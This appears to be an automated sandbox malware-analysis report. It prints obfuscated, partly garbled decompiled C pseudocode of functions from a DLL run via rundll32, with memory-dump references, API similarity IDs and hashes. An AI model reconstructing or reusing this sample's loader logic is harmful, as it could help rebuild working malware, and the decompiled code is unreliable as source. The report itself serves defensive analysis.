                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ProtectVirtual$CreateCurrentSectionThread
                • String ID:
                • API String ID: 1345506602-0
                • Opcode ID: cce895ea8ed1431f6779cb85fa0147dc2f3519a9c2047c01d5325abb22bfc599
                • Instruction ID: a767095fbec2c711508090b3bb68a2210375bc3758edbd2e04cea852539b85af
                • Opcode Fuzzy Hash: cce895ea8ed1431f6779cb85fa0147dc2f3519a9c2047c01d5325abb22bfc599
                • Instruction Fuzzy Hash: A6511276614B8486DB44CF2AD8843AA37A9F388F88F188136DF8D9B768DF34C1918750
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 38%
                			E00007FFA7FFA535FB25C(void* __edx, void* __esi, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32, long long _a40, long long _a48) {
                				long long _v32;
                				long long _v40;
                				char _t51;
                				void* _t54;
                				void* _t55;
                				void* _t64;
                				long long _t65;
                				intOrPtr* _t67;
                				long long _t70;
                				intOrPtr _t79;
                				intOrPtr* _t92;
                				void* _t95;
                				long long _t98;
                				void* _t100;
                				HANDLE* _t108;
                				void* _t111;
                				void* _t114;
                
                				_t64 = _t100;
                				 *((long long*)(_t64 + 8)) = __rbx;
                				 *((long long*)(_t64 + 0x10)) = __rbp;
                				 *((long long*)(_t64 + 0x18)) = __rsi;
                				 *((long long*)(_t64 + 0x20)) = __rdi;
                				_t79 =  *0x5367c000; // 0x2151e49def0
                				_t98 = _a48;
                				_t95 = __r8;
                				r15d = __edx;
                				_t92 = __rcx;
                				 *((char*)(_t79 + 0x408)) = 0;
                				_t65 =  *((intOrPtr*)(_t79 + 0x2a0));
                				if ((bpl & 0x00000040) == 0) goto 0x535fb2ef;
                				GetCurrentThreadId();
                				 *((long long*)(_t79 + 0x200)) = _t65;
                				if (_t65 == 0) goto 0x535fb2ef;
                				 *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x10)) - 0x77)) =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x10)) - 0x77)) + _t55;
                				asm("ror dword [eax-0x77], 0x5c");
                				r9d = 0xbbbb90000157a;
                				_t51 = E00007FFA7FFA535E2C34(__edx,  *((long long*)( *((intOrPtr*)(__r8 + 0x10)) + 0x44000001)) - 0xffffff8b, _t79, 0x1515, __rcx, __r8, _t98, __r8,  *((intOrPtr*)(_t65 + 0x148)));
                				 *((char*)(_t79 + 0x408)) = _t51;
                				_t67 =  *((intOrPtr*)(_t79 + 0x240));
                				_t22 = _t79 + 0x204; // 0x2151e49e0f4
                				_v32 = _t22;
                				 *_t67 =  *_t67 + _t51;
                				r8d = 0x181f;
                				_v40 =  *((intOrPtr*)(_t79 +  *(_t67 + 0x2a8) * 8 - 0x10620));
                				E00007FFA7FFA535E1000( *((intOrPtr*)(_t79 +  *(_t67 + 0x2a8) * 8 - 0x10620)), _t79, __r8, _t114, _t111); // executed
                				_t70 = _a40;
                				_v32 = _t98;
                				_v40 = _t70;
                				NtOpenFile(_t108, ??, ??, ??, ??); // executed
                				 *((long long*)(_t79 + 0x404)) = _t70;
                				if ( *((char*)(_t79 + 0x408)) == 0) goto 0x535fb365;
                				 *((long long*)(_t79 + 0x2f0)) =  *_t92;
                				goto 0x535fb3a5;
                				r9d = 0x157a;
                				_t37 = _t79 - 0x19bba; // 0x2151e484336
                				_v32 = _t37 +  *( *((intOrPtr*)(_t79 + 0x160)) + 0x1b0) * 0xd;
                				_v40 =  *((intOrPtr*)(_t79 + 0x280));
                				_t54 = E00007FFA7FFA535E1000( *((intOrPtr*)(_t79 + 0x280)), _t79, _t95); // executed
                				 *((long long*)( *((intOrPtr*)(_t79 + 0x358)) + 0x130)) =  *((long long*)( *((intOrPtr*)(_t79 + 0x358)) + 0x130)) + 0xffffdeec;
                				return _t54;
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: CurrentFileOpenThread
                • String ID:
                • API String ID: 2680504152-0
                • Opcode ID: 4fa0dbaa573a6abbb2b3fd4ab1287ece3485c117b37b632e354cfde2e32bce3e
                • Instruction ID: 607b1d3a926ce3a5dafa3b892edf20275d0b09b2e5c5be049f533fdde1a5e682
                • Opcode Fuzzy Hash: 4fa0dbaa573a6abbb2b3fd4ab1287ece3485c117b37b632e354cfde2e32bce3e
                • Instruction Fuzzy Hash: A9419E72618B8586E710CF26E4806AD77A5F789F98F084135DF8C5BBA9CF38D141CB14
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E00007FFA7FFA535F84F0(void* __edi, void* __esp, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9) {
                				void* __rdi;
                				signed int _t213;
                				signed int _t218;
                				void* _t221;
                				signed int _t223;
                				void* _t236;
                				signed int _t237;
                				signed int _t239;
                				long long _t242;
                				intOrPtr* _t264;
                				void* _t293;
                				signed int _t314;
                				signed long long _t373;
                				signed long long _t381;
                				signed long long _t385;
                				signed long long _t388;
                				long long _t397;
                				void* _t398;
                				void* _t400;
                				void* _t401;
                				signed long long _t414;
                				struct _CRITICAL_SECTION* _t425;
                				long long* _t426;
                				signed long long _t428;
                				struct _CRITICAL_SECTION* _t430;
                				void* _t432;
                				signed long long _t433;
                				void* _t435;
                				intOrPtr* _t436;
                
                				_t236 = _t400;
                				 *((long long*)(_t236 + 8)) = __rbx;
                				 *((long long*)(_t236 + 0x10)) = _t397;
                				 *((long long*)(_t236 + 0x18)) = __rsi;
                				 *(_t236 + 0x20) = r9d;
                				_t401 = _t400 - 0x70;
                				_t237 =  *(_t401 + 0xf0);
                				_t314 =  *(_t401 + 0xd8);
                				r9d = r9d + 0x6c3;
                				_t398 = __r8;
                				r10d =  *(_t401 + 0xc0);
                				 *((long long*)(_t401 + 0xe8)) =  *((long long*)(_t401 + 0xe8)) + 0xfffff9e0;
                				r12d = _t237 - 0x1ad7;
                				 *(_t401 + 0x50) = r12d;
                				 *((long long*)(_t401 + 0x58)) = _t237 + 0xfffff71a;
                				r8d =  *(_t401 + 0xd0) + 0x4f3;
                				_t239 =  *(_t401 + 0xe0);
                				r15d = _t314 - 0x1ec0;
                				r10d = r10d + 0xffffeaeb;
                				 *(_t401 + 0x54) = r9d;
                				 *(_t401 + 0xf0) = r8d;
                				r13d = _t314 - 0xc13;
                				 *(_t401 + 0xd8) = r10d;
                				r14d = _t239 + 0x9c9;
                				 *(_t401 + 0xd0) = r14d;
                				 *(_t401 + 0xc0) = _t239 + 0xfffff9e5;
                				if ( *((intOrPtr*)(_t401 + 0xc8)) - r9d <= 0) goto 0x535f8bdb;
                				if (r14d - _t221 <= 0) goto 0x535f8bdb;
                				if (r8d - _t430 + 0x89a > 0) goto 0x535f88c3;
                				_t242 =  *((intOrPtr*)(__r8 + 0x468));
                				 *((long long*)(_t242 + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x358)) + 0x148)) + 0x610e;
                				 *((intOrPtr*)(__r8 + 0x3e0))();
                				 *((long long*)(__r8 + 0x3d8)) = _t242;
                				r13d = 0x1352;
                				 *( *((intOrPtr*)(__r8 + 0x240)) + 0x450) =  *( *((intOrPtr*)(__r8 + 0x240)) + 0x450) * ((M00007FFA7FFA5366FD45 & 0x000000ff) + 0x181f);
                				 *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x110)) + 0x3c8)) =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x110)) + 0x3c8)) - ( *( *((intOrPtr*)(__r8 + 0x2a0)) + 0x230) ^ 0x00001320);
                				 *((long long*)( *((intOrPtr*)(__r8 + 0x5e8)) + 0xa8)) =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x110)) + 0x90)) + 0xbbb;
                				if ( *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x358)) + 0x148)) == _t430) goto 0x535f8881;
                				_t48 = _t398 + 0x280; // 0x15d2
                				_t436 = _t48;
                				_t49 = _t398 + 0x25a; // 0x15ac
                				_t426 = _t49;
                				r8d = _t223;
                				 *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x358)) + 0x390)) =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x358)) + 0x390)) + 0x1b47 -  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x358)) + 0x190));
                				 *( *((intOrPtr*)(__r8 + 0x108)) + 0x28) =  *( *((intOrPtr*)(__r8 + 0x108)) + 0x28) |  *( *((intOrPtr*)(__r8 + 0x358)) + 0x358) ^ 0x00001582;
                				 *( *((intOrPtr*)(__r8 + 0x108)) + 0x1d0) =  *( *((intOrPtr*)(__r8 + 0x108)) + 0x1d0) |  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x358)) + 0x318)) - 0x0000181f;
                				 *(_t426 - 2) = _t218;
                				 *(( *(__r8 + 0x1b0) ^ 0x00001fd3) + 0xfffffda6 + _t426 + __r8 + 0x258) =  *( *((intOrPtr*)(__r8 + 0x5e8)) + 0x68) ^ 0xe3ff5482;
                				 *_t426 =  *((intOrPtr*)(_t436 + 0x30));
                				 *( *((intOrPtr*)(__r8 + 0x20)) + 0x128) =  *( *((intOrPtr*)(__r8 + 0x20)) + 0x128) * 0x15fd;
                				_t76 = _t398 + 0x204; // 0x1556
                				E00007FFA7FFA535E3B00(_t218, __edi, _t223, __esp, _t76 + __rbx,  *_t436, 0xfffffda6 - __r8, 0,  *( *((intOrPtr*)(__r8 + 0x5e8)) + 0x148) ^ 0x00001358);
                				r9d = 0x16ce;
                				r8d = 0x10ae;
                				 *( *((intOrPtr*)(__r8 + 0x358)) + 0x470) =  *( *((intOrPtr*)(__r8 + 0x358)) + 0x470) ^  *( *((intOrPtr*)(__r8 + 0x5e8)) + 0x140);
                				 *( *((intOrPtr*)(__r8 + 0x5e8)) + 0x140) =  *( *((intOrPtr*)(__r8 + 0x5e8)) + 0x140) - 1;
                				_t264 =  *((intOrPtr*)(__r8 + 0x108));
                				 *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x358)) + 0x230)) =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x358)) + 0x230)) -  *((intOrPtr*)(_t264 + 0x178));
                				 *_t264 =  *_t264 + _t264;
                				 *((intOrPtr*)(_t264 - 0x75)) =  *((intOrPtr*)(_t264 - 0x75)) + _t218;
                				asm("int 0x48");
                				 *((long long*)(_t264 + 0x178)) =  *((long long*)(_t264 + 0x178)) + 1;
                				_t96 = _t398 + 0x258; // 0x15aa
                				 *(_t401 + 0x28) = _t96 + __rbx;
                				 *(_t401 + 0x20) =  *_t436;
                				E00007FFA7FFA535E1000( *_t436,  *((intOrPtr*)(_t264 + 0x178)), 0, _t435, _t432); // executed
                				 *( *((intOrPtr*)(_t398 + 0x160)) + 0x3a0) =  *( *((intOrPtr*)(_t398 + 0x5e8)) + 0x190) ^ 0x000012ad;
                				 *( *((intOrPtr*)(_t398 + 0x5e8)) + 0x360) =  *( *((intOrPtr*)(_t398 + 0x5e8)) + 0x360) ^  *(_t398 + 0x298) + 0x00002114;
                				if (_t223 -  *((intOrPtr*)( *(_t398 + 0x358) + 0x148)) - _t430 < 0) goto 0x535f86b0;
                				 *((long long*)( *((intOrPtr*)(_t398 + 0x468)))) =  *((intOrPtr*)( *((intOrPtr*)(_t398 + 0x110)) + 0x70)) + 0x70694fe0;
                				r14d = r14d - 0x19f;
                				 *((long long*)( *((intOrPtr*)(_t398 + 0x468)) + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t398 + 0x5e8)) + 0x148)) + 0x2e736217;
                				goto 0x535f8bdb;
                				_t213 = r15d | r12d;
                				if (r12d - _t213 < 0) goto 0x535f8b74;
                				_t385 =  *((intOrPtr*)(_t398 + 0x488));
                				_t373 =  *(_t398 + 0x450) & _t385 | 0x0000145c;
                				if ( *((intOrPtr*)(_t398 + 0x240)) != _t373) goto 0x535f89ad;
                				 *((long long*)(_t401 + 0x60)) =  *((intOrPtr*)(_t398 + 0x110)) +  *((intOrPtr*)(_t398 + 0x5e0));
                				 *((long long*)(_t401 + 0x68)) = (r10d |  *(_t398 + 0x1b0)) + 0xffffdeec;
                				_t433 =  *((intOrPtr*)(_t401 + 0x68));
                				_t428 =  *((intOrPtr*)(_t401 + 0x60));
                				r8d = r8d + 2;
                				r15d = r15d - (_t218 & r15d);
                				if (r8d == _t373) goto 0x535f8964;
                				r14d =  *(_t401 + 0xd0);
                				r12d =  *(_t401 + 0x50);
                				 *(_t398 + 0x358) =  *(_t398 + 0x358) ^ _t428;
                				 *(_t398 + 0x5d8) =  *(_t398 + 0x5d8) * _t433;
                				 *(_t398 + 0x1a8) =  *(_t398 + 0x1a8) + (r13d | r12d);
                				 *(_t398 + 0x398) =  *(_t398 + 0x248) * 0x1320;
                				r10d = r14d;
                				r11d =  *(_t398 + 0x2a0);
                				r13d = r13d | _t213;
                				r9d =  *(_t398 + 0x3a0);
                				r11d = r11d | _t213;
                				r10d = r10d &  *(_t401 + 0xd8);
                				r9d = r9d - 0x157a;
                				r9d = r9d |  *(_t398 + 0x68);
                				 *(_t398 + 0x350) =  *(_t398 + 0x350) ^ (_t385 -  *((intOrPtr*)(_t398 + 0x2a8)) |  *(_t401 + 0xf0));
                				 *(_t401 + 0x28) = r11d;
                				 *(_t401 + 0x20) = r10d;
                				EnterCriticalSection(_t430);
                				r10d = _t433 + _t428;
                				r11d =  *(_t398 + 0x70);
                				r11d = r11d +  *(_t398 + 0x358);
                				r8d =  *(_t398 + 0x2c8);
                				r9d =  *(_t401 + 0xe0);
                				r8d = r8d + 0x1320;
                				r10d = r10d |  *(_t398 + 0x140);
                				r9d = r9d + 0x421;
                				 *(_t401 + 0x40) = r8d;
                				_t388 = r9d;
                				r8d = 0;
                				 *(_t401 + 0x38) = r10d;
                				r11d = r11d * r12d;
                				 *(_t398 + 0x108) =  *(_t398 + 0x108) | r12d ^ 0x00001515;
                				 *(_t398 + 0x1a8) = _t388 -  *((intOrPtr*)(_t398 + 0x5e8));
                				 *(_t401 + 0x30) = r11d;
                				_t293 =  *(_t401 + 0xd8) +  *((intOrPtr*)(_t398 + 0x3b8)) -  *(_t401 + 0xc0);
                				r9d = r9d + _t213;
                				 *(_t401 + 0x28) =  *(_t398 + 0x3c8) ^  *(_t398 + 0x298) | 0x00001ba7;
                				 *(_t401 + 0x20) = r9d;
                				E00007FFA7FFA535F6E94(_t293,  *(_t398 + 0x3c8) ^  *(_t398 + 0x298) | 0x00001ba7,  *(_t401 + 0x54) & 0x0000181f,  *((intOrPtr*)(_t398 + 0x1d0)) +  *(_t401 + 0xf0) ^  *(_t401 + 0xb8), _t218 & r15d, _t398,  *(_t398 + 0x5d8) * _t433);
                				 *(_t398 + 0xb0) =  *(_t398 + 0xb0) + _t293;
                				 *(_t398 + 0x3d0) =  *(_t398 + 0x3d0) ^  *(_t398 + 0x358) - 0x00001ba7;
                				r13d = r13d - _t293;
                				 *(_t398 + 0x108) =  *(_t398 + 0x108) ^ ( *(_t398 + 0x420) &  *(_t398 + 0x230)) * _t388;
                				 *((intOrPtr*)(_t398 + 0x80)) =  *((intOrPtr*)(_t398 + 0x80)) - (r13d |  *(_t398 + 0x3d0));
                				r15d = r15d -  *((intOrPtr*)(_t401 + 0xe8));
                				LeaveCriticalSection(_t425);
                				_t414 =  *((intOrPtr*)(_t401 + 0x58));
                				_t381 =  *(_t398 + 0x5d0) | _t414;
                				if ( *(_t398 + 0x3a0) - _t381 > 0) goto 0x535f8bdb;
                				r8d = r8d + 3;
                				if (r8d - _t381 <= 0) goto 0x535f8bae;
                				 *(_t398 + 0x1a8) =  *(_t398 + 0x1a8) ^ ( *(_t398 + 0x3d0) ^ _t414) +  *((intOrPtr*)(_t398 + 0x390));
                				 *(_t398 + 0x330) =  *(_t398 + 0x330) |  *(_t398 + 0xb0) | 0x0000145c;
                				return _t433 - 0x67b;
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: CriticalProtectSectionVirtual$EnterLeave
                • String ID:
                • API String ID: 130458602-0
                • Opcode ID: b6afa930ee8906a2232bb450f73c58f4f08114434751a5a7ffdf20fe04c22972
                • Instruction ID: 02d6a5a93a868638aef57833eff24a1c7189564729fb9462f7a3ca9041d7cce2
                • Opcode Fuzzy Hash: b6afa930ee8906a2232bb450f73c58f4f08114434751a5a7ffdf20fe04c22972
                • Instruction Fuzzy Hash: 74022272614BC48ADB74CF25D8847EA77A9F788B88F054126DB8D5BB58DF38D690CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 82%
                			E00007FFA7FFA535F6898(void* __rcx, signed long long __rdx, void* __r8, void* __r9) {
                				void* __rbx;
                				void* _t159;
                				signed int _t163;
                				signed int _t169;
                				signed int _t171;
                				signed int _t175;
                				signed int _t177;
                				signed long long _t196;
                				signed int _t197;
                				signed int _t202;
                				long long _t210;
                				long long _t239;
                				signed long long _t250;
                				signed long long _t263;
                				signed int _t295;
                				signed long long _t315;
                				void* _t318;
                				void* _t324;
                				signed int _t325;
                				signed int _t326;
                				void* _t327;
                				signed long long _t331;
                				void* _t339;
                				void* _t340;
                				void* _t341;
                				void* _t342;
                				void* _t343;
                
                				_t304 = __rdx;
                				r12d =  *(_t327 + 0xd0);
                				r14d = __r8 - 0x1569;
                				r8d =  *(_t327 + 0xf0);
                				_t4 = _t304 - 0x54f; // -552
                				r11d = _t4;
                				 *(_t327 + 0xe0) =  *(_t327 + 0xe0) + 0x2bc;
                				_t9 = _t304 + 0x54a; // 0x871
                				r10d = _t9;
                				_t326 =  *((intOrPtr*)(_t327 + 0xe8));
                				_t11 = _t304 - 0x15fd; // -4822
                				 *(_t327 + 0x50) = r11d;
                				 *(_t327 + 0xf0) = _t196;
                				r13d = __rcx + 0x379;
                				_t197 = __rcx - 0x6c0;
                				 *(_t327 + 0xd0) = r14d;
                				r12d = r12d + 0xffffff29;
                				 *(_t327 + 0xb0) = _t197;
                				 *(_t327 + 0xc8) = r10d;
                				r9d = r9d + 0xffffedd2;
                				 *(_t327 + 0xc0) = _t197;
                				_t318 =  *(_t327 + 0xd8) + 0xfffffc27;
                				 *(_t327 + 0xd8) = r9d;
                				_t159 = _t340 + 0xb13;
                				r15d = __r8 - 0x1486;
                				if (r11d - _t159 > 0) goto 0x535f6ad9;
                				 *((long long*)(_t326 + 0x430)) =  *((intOrPtr*)(_t326 + 0x150));
                				r15d = r15d + 0xa5d;
                				 *((long long*)( *(_t326 + 0x108) + 0x338)) = 0x262b;
                				r14d = r14d + 0x1b47;
                				 *( *(_t326 + 0x160) + 0x1a8) =  *( *((intOrPtr*)(_t326 + 0x2a0)) + 0x3b8) ^ 0x00001569;
                				r8d =  *(_t327 + 0xe0);
                				_t202 = _t318 + 0xaf9;
                				if (r11d - _t159 > 0) goto 0x535f6e7c;
                				if (r11d == _t340 + 0x1305) goto 0x535f69f7;
                				r14d = r14d - 0x89a;
                				r13d = r13d - 0x319;
                				if (r12d - _t341 - 0x887 >= 0) goto 0x535f6d8f;
                				r10d =  *(_t327 + 0xf0);
                				r11d = __r9 + 0x68e;
                				r10d = r10d + 0xfffff9db;
                				r9d = r9d + 0xf15;
                				 *(_t327 + 0x38) = _t202;
                				 *(_t327 + 0x30) = __rdx;
                				r8d = r8d + 0x94;
                				 *(_t327 + 0x28) = r10d;
                				 *(_t327 + 0x20) = r11d;
                				_t163 = E00007FFA7FFA535F7A40(_t11 + 0x12ad, _t324 + 0x157a, _t326, __r8, __r9, _t339); // executed
                				_t263 = _t318 + 0x467;
                				_t325 = _t324 + 0x1582;
                				r10d = _t341 - 0x4d9;
                				 *(_t327 + 0x48) = r10d;
                				r11d = _t342 + 0x2bc;
                				 *(_t327 + 0x40) = r11d;
                				r9d = _t340 + 0x9c7;
                				 *(_t327 + 0x38) = r13d;
                				r8d = _t342 - 0xbc;
                				 *(_t327 + 0x30) = _t263;
                				 *(_t327 + 0x28) =  *(_t327 + 0xd8) + 0x1348;
                				r15d = _t163;
                				 *(_t327 + 0x20) = _t325;
                				E00007FFA7FFA535F9C34(); // executed
                				 *_t202 =  *_t202 + _t163;
                				 *0x48000003 = _t202;
                				 *_t202 =  *_t202 + _t163;
                				r8d = _t177;
                				goto 0x535f6b2e;
                				if ( *(_t326 + 0x110) - 0x11f1 <= 0) goto 0x535f6b27;
                				 *(_t326 + 0x240) =  *(_t326 + 0x240) * (r12d | 0x00001582);
                				r8d = r8d + 3;
                				if (r8d - (0x00000bbb | r14d) > 0) goto 0x535f6aee;
                				_t210 =  *((intOrPtr*)(_t326 + 0xa8));
                				 *((long long*)(_t327 + 0xb8)) = _t210;
                				if (_t210 -  *(_t327 + 0xf0) *  *(_t326 + 0x140) <= 0) goto 0x535f69c5;
                				 *(_t327 + 0x58) =  *(_t327 + 0xb0) ^ r14d;
                				r8d =  *(_t326 + 0x138);
                				r8d = r8d + 0x1320;
                				r12d = r12d * r12d;
                				 *(_t326 + 0x320) =  *(_t326 + 0x320) * ( *(_t326 + 0x3d0) -  *((intOrPtr*)(_t326 + 0x5e0)) -  *(_t326 + 0x110));
                				EnterCriticalSection(??);
                				 *(_t326 + 0x158) =  *(_t326 + 0x158) - ( *(_t326 + 0x178) ^  *(_t327 + 0xc0));
                				 *(_t327 + 0xe0) =  *(_t327 + 0xe0) - ( *(_t326 + 0x238) ^  *(_t327 + 0xd8) ^ 0x00001487);
                				r11d =  *(_t326 + 0x128);
                				r11d = r11d * _t177;
                				r11d = r11d & r14d;
                				 *(_t327 + 0x28) = r13d;
                				 *(_t327 + 0x20) = r11d;
                				_t169 = GetLastError();
                				r8d =  *(_t327 + 0xe0);
                				r9d =  *(_t327 + 0xd8);
                				_t171 = _t169 * r9d * r15d;
                				r8d = r8d + _t171;
                				 *(_t327 + 0xe0) = r8d;
                				 *(_t326 + 0x3d0) =  *(_t326 + 0x3d0) *  *(_t327 + 0x58);
                				 *(_t327 + 0xd0) =  *(_t327 + 0xd0) ^  *((intOrPtr*)(_t326 + 0x38)) + 0xffffee0f + _t325;
                				 *(_t326 + 0x160) =  *(_t326 + 0x160) | ( *(_t326 + 0x110) & r14d) -  *((intOrPtr*)(_t326 + 0x70));
                				 *(_t326 + 0x410) =  *(_t326 + 0x410) * ( *(_t326 + 0x158) |  *(_t326 + 0x108));
                				_t315 = _t171;
                				 *(_t327 + 0xf0) =  *(_t326 + 0x1d0) | 0x00000651;
                				 *(_t326 + 0x5d0) =  *(_t326 + 0x5d0) + ( *((intOrPtr*)(_t326 + 0x2e0)) + _t315 | 0x0000157a);
                				_t239 =  *((intOrPtr*)(_t327 + 0xb8)) + 1;
                				 *((long long*)(_t327 + 0xb8)) = _t239;
                				if (_t239 -  *(_t326 + 0x140) * _t315 > 0) goto 0x535f6b74;
                				r10d =  *(_t327 + 0xc8);
                				r11d =  *(_t327 + 0x50);
                				goto 0x535f69cd;
                				_t295 = _t177;
                				if (_t295 -  *(_t326 + 0x3d0) +  *((intOrPtr*)(_t326 + 0x168)) > 0) goto 0x535f6e7c;
                				if (_t295 - ( *(_t326 + 0x2a8) + 0x00001ad7 ^  *(_t326 + 8)) >= 0) goto 0x535f6e7c;
                				_t331 =  *(_t326 + 0x110);
                				 *((intOrPtr*)(_t326 + 0x58)) =  *((intOrPtr*)(_t326 + 0x58)) + r10d -  *((intOrPtr*)(_t326 + 0x230));
                				_t250 = ( *(_t326 + 0x5d0) *  *(_t326 + 0x2a8) + 0x1582) * _t263;
                				 *(_t326 + 0x318) =  *(_t326 + 0x318) ^ _t250 * _t331;
                				 *((intOrPtr*)(_t326 + 0x300)) =  *((intOrPtr*)(_t326 + 0x300)) + _t250;
                				_t175 = r15d | r13d;
                				r10d = r10d - _t175;
                				 *(_t326 + 0x110) =  *(_t326 + 0x320) + 0xfffffab6 + _t331;
                				 *((long long*)(_t326 + 0x418)) =  *((intOrPtr*)(_t326 + 0x198)) + 0x10ae;
                				r15d = r15d ^ _t175;
                				 *(_t326 + 0x1d0) =  *(_t326 + 0x1d0) |  *(_t326 + 0x340) ^ 0x0000157a |  *(_t326 + 0x298) | r10d;
                				return _t343 - 0x650;
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: CriticalEnterErrorLastSection
                • String ID:
                • API String ID: 3668107397-0
                • Opcode ID: e664c20afb270eb3d76d07312c65cf6c1bd6d9867d7d1aa7209a603ec08a79f5
                • Instruction ID: bbce37362446a5f7e6105aa051ec284556b92b8b0cbafd4f6406950cbdf6777d
                • Opcode Fuzzy Hash: e664c20afb270eb3d76d07312c65cf6c1bd6d9867d7d1aa7209a603ec08a79f5
                • Instruction Fuzzy Hash: EAE14773614AC58ED734CF24E8817EA77A9F788748F005126DB4E9BB98DB78E654CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 78%
                			E00007FFA7FFA535F5694(void* __rax, signed int __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8) {
                				void* _t111;
                				void* _t118;
                				signed int _t120;
                				void* _t124;
                				intOrPtr _t129;
                				signed long long _t141;
                				long long _t150;
                				signed int _t153;
                				intOrPtr _t154;
                				signed int _t179;
                				long _t188;
                				signed long long _t189;
                				signed long long _t193;
                				long long _t197;
                				signed long long _t198;
                				void* _t201;
                				void* _t202;
                				void* _t206;
                				void* _t207;
                				long _t209;
                				PVOID* _t211;
                				void* _t213;
                				void* _t215;
                
                				 *((long long*)(_t201 + 8)) = __rbx;
                				 *((long long*)(_t201 + 0x10)) = _t197;
                				 *((long long*)(_t201 + 0x18)) = __rsi;
                				_t202 = _t201 - 0x50;
                				_t179 =  *(_t202 + 0xb0);
                				r14d = __rcx - 0x10ae;
                				_t129 =  *((intOrPtr*)(_t202 + 0xb8));
                				r8d =  *(_t202 + 0xa8);
                				r12d =  *(_t202 + 0xd0);
                				r8d = r8d + 0xfffff652;
                				r12d = r12d + 0xfffff36e;
                				_t198 = _t179 + 0x572;
                				r13d = _t129 - 0x1487;
                				_t189 = _t198;
                				_t193 = _t179 - 0x12ad;
                				 *(_t202 + 0xb0) = _t129 + 0xf3;
                				r15d =  *((intOrPtr*)(_t202 + 0xc8)) - 0x379;
                				if (r8d - _t111 >= 0) goto 0x535f58d1;
                				r11d = _t213 + 0x11f1;
                				 *((intOrPtr*)(_t202 + 0x40)) = r11d;
                				 *(_t202 + 0x38) = __rbx;
                				r10d = _t198 - 0x2a5;
                				_t153 =  *((intOrPtr*)(_t202 + 0xc0));
                				r9d = _t209 + 0x157a;
                				 *(_t202 + 0x30) =  *((intOrPtr*)(_t202 + 0xa0)) + 0xc64;
                				r8d = _t215 + 0x22d;
                				 *(_t202 + 0x28) = _t179;
                				 *(_t202 + 0x20) = r10d;
                				E00007FFA7FFA535F615C( *((intOrPtr*)(_t202 + 0xa0)) + 0xc64, _t153, _t198 + 0x328, _t153, __r8, _t206); // executed
